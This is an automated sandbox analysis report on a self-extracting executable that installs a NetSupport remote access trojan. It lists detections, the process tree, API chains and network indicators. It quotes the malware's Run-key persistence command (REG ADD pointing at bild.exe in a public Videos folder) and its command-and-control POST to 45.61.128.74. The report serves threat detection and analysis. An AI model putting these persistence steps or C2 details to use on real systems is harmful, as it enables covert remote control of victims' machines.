Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1556890
MD5:166d71e145b2c802acd2b0a07e070bad
SHA1:1c84d2e573e7096040fbe6e950fbff764aa11096
SHA256:33b22fce68d5d7bd08e86b8506c50bdfcd38c26db5983864e8d33bdf62f53272
Tags:exeuser-Bitsight
Infos:

Detection

NetSupport RAT
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Contains functionalty to change the wallpaper
Delayed program exit found
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 166D71E145B2C802ACD2B0A07E070BAD)
    • cmd.exe (PID: 7456 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 7512 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • bild.exe (PID: 7552 cmdline: C:\Users\Public\Public\Videos\Video\bild.exe MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • bild.exe (PID: 7720 cmdline: "C:\Users\Public\Public\Videos\Video\bild.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • bild.exe (PID: 7988 cmdline: "C:\Users\Public\Public\Videos\Video\bild.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Public\Videos\Video\bild.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\Public\Public\Videos\Video\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\Public\Public\Videos\Video\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\Public\Public\Videos\Video\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\Public\Public\Videos\Video\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 2 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000004.00000002.4157805406.00000000002D2000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              00000009.00000002.1904648910.00000000002D2000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000009.00000002.1905862105.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  00000005.00000002.1827675738.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    00000005.00000000.1823569679.00000000002D2000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 22 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      5.2.bild.exe.6d0b0000.4.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        4.2.bild.exe.6d0b0000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          9.2.bild.exe.6d0b0000.4.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            9.0.bild.exe.2d0000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              9.2.bild.exe.2d0000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 22 entries

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: Execution from Suspicious Folder
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Public\Videos\Video\bild.exe, CommandLine: C:\Users\Public\Public\Videos\Video\bild.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Public\Videos\Video\bild.exe, NewProcessName: C:\Users\Public\Public\Videos\Video\bild.exe, OriginalFileName: C:\Users\Public\Public\Videos\Video\bild.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7456, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Public\Videos\Video\bild.exe, ProcessId: 7552, ProcessName: bild.exe
                                Sigma detected: New RUN Key Pointing to Suspicious Folder
                                Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Public\Videos\Video\bild.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7512, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat
                                Sigma detected: Suspicious Program Location with Network Connections
                                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 45.61.128.74, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Public\Videos\Video\bild.exe, Initiated: true, ProcessId: 7552, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                                Sigma detected: CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Public\Videos\Video\bild.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7512, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat
                                Sigma detected: Direct Autorun Keys Modification
                                Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7456, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe", ProcessId: 7512, ProcessName: reg.exe
                                Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7456, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe", ProcessId: 7512, ProcessName: reg.exe

                                Suricata Signatures

                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-11-16T12:41:03.602345+010028277451Malware Command and Control Activity Detected192.168.2.44973045.61.128.74443TCP

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Multi AV Scanner detection for dropped file
                                Source: C:\Users\Public\Public\Videos\Video\PCICL32.DLLVirustotal: Detection: 16%Perma Link
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeReversingLabs: Detection: 28%
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeVirustotal: Detection: 49%Perma Link
                                Source: C:\Users\Public\Public\Videos\Video\remcmdstub.exeReversingLabs: Detection: 13%
                                Multi AV Scanner detection for submitted file
                                Source: file.exeReversingLabs: Detection: 50%
                                Source: file.exeVirustotal: Detection: 51%Perma Link
                                AI detected suspicious sample
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.0% probability
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,4_2_110AD570
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,5_2_110AD570
                                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\Public\Public\Videos\Video\msvcr100.dllJump to behavior
                                Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: file.exe
                                Source: Binary string: msvcr100.i386.pdb source: file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, bild.exe, 00000004.00000002.4161525589.000000006C951000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 00000005.00000002.1828324203.000000006C951000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 00000009.00000002.1906366443.000000006C951000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: bild.exe, 00000004.00000002.4161859396.000000006E512000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 00000005.00000002.1828623878.000000006E512000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 00000009.00000002.1906634135.000000006E512000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905822054.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: bild.exe, 00000004.00000002.4161374183.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: bild.exe, 00000004.00000002.4157805406.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000004.00000000.1717304165.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000005.00000000.1823569679.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000005.00000002.1826096354.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000009.00000002.1904648910.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000009.00000000.1903730466.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, bild.exe.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: bild.exe, 00000004.00000002.4161374183.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: bild.exe, 00000004.00000002.4161743565.000000006D0B5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 00000005.00000002.1828561187.000000006D0B5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 00000009.00000002.1906535129.000000006D0B5000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: TCCTL32.DLL.0.dr
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0015A273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0015A273
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016A537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0016A537
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102D330
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,4_2_11065890
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,4_2_1106A0A0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,4_2_111266E0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,5_2_1102D330
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,5_2_11065890
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,5_2_1106A0A0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,5_2_111266E0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,5_2_1110AFD0

                                Networking

                                barindex
                                Suricata IDS alerts for network traffic
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.4:49730 -> 45.61.128.74:443
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 104.26.0.231 104.26.0.231
                                Source: Joe Sandbox ViewASN Name: M247GB M247GB
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.128.74
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.128.74
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.128.74
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: unknownHTTP traffic detected: POST http://45.61.128.74/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 45.61.128.74Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                                Source: bild.exe, bild.exe, 00000004.00000002.4161374183.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/fakeurl.htm
                                Source: bild.exe, bild.exe, 00000004.00000002.4161374183.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/testpage.htm
                                Source: bild.exe, 00000004.00000002.4161374183.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/testpage.htmwininet.dll
                                Source: bild.exe, bild.exe, 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905822054.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://127.0.0.1
                                Source: file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905822054.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0$
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                                Source: bild.exe, bild.exe, 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905822054.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: bild.exe, 00000004.00000002.4158412935.0000000000A65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspD
                                Source: file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905822054.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                                Source: file.exe, 00000000.00000003.1700783369.000000000306B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                Source: file.exe, 00000000.00000003.1700783369.000000000306B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://s2.symcb.com0
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                                Source: file.exe, 00000000.00000003.1700783369.000000000306B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                Source: file.exe, 00000000.00000003.1700783369.000000000306B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                Source: file.exe, 00000000.00000003.1700783369.000000000306B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://sv.symcd.com0&
                                Source: file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1827675738.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905862105.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1827675738.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905862105.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
                                Source: file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1827675738.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905862105.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.pci.co.uk/support
                                Source: file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1827675738.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905862105.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: file.exe, 00000000.00000003.1700783369.000000000306B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://www.symauth.com/cps0(
